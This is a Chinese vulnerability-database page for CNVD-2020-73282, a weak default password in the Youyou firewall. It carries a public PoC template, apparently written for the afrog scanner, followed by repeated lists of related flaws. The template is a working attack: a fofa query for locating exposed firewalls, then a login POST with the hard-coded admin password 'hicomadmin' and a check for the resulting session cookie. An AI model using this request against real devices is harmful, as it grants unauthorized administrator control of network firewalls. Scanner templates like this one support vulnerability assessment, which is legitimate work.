CNVD-2020-73282: 佑友防火墙弱口令

PoC代码[已公开]

id: CNVD-2020-73282

info:
    name: 佑友防火墙弱口令
    author: 你是猪！！！
    severity: high
    description: fofa title="佑友防火墙"

rules:
    r1:
        request:
            method: POST
            path: /index.php?c=user&a=ajax_save
            headers:
                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            body: username=admin&password=hicomadmin&language=zh-cn
        expression: |
            response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie')  && response.raw_header.bcontains(b'FWSESSID=')
expression: r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2020/CNVD-2020-73282.yaml

CNVD-2020-73282: 佑友防火墙弱口令

漏洞描述

PoC代码[已公开]

相关漏洞推荐

漏洞描述

PoC代码[已公开]

相关漏洞推荐

佑友防火墙弱口令漏洞 无POC

佑友防火墙弱口令漏洞 无POC

佑友防火墙 download 任意文件读取漏洞 无POC

youyou-firewall-rce: 佑友防火墙 后台命令执行漏洞 POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

佑友防火墙弱口令漏洞无POC

佑友防火墙弱口令漏洞无POC

佑友防火墙 download 任意文件读取漏洞无POC

youyou-firewall-rce: 佑友防火墙后台命令执行漏洞 POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC